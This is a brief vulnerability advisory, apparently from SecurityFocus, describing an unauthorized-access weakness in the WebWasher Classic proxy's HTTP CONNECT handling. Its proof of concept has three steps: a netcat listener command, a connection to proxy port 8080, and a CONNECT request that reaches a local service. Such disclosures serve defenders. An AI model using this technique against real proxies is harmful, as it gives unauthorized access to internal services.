WebWasher Classic HTTP CONNECT Unauthorized Access Weakness

An exploit is not required.

The following proof of concept is available:
1) Start a netcat listener on the WebWasher system:
netcat -L -p 99 -s < hallo.txt
2) Connect to the WebWasher proxy port (default 8080/tcp)
3) Enter command "CONNECT HTTP/1.0"

As a result, content of hallo.txt will appear.


Privacy Statement
Copyright 2010, SecurityFocus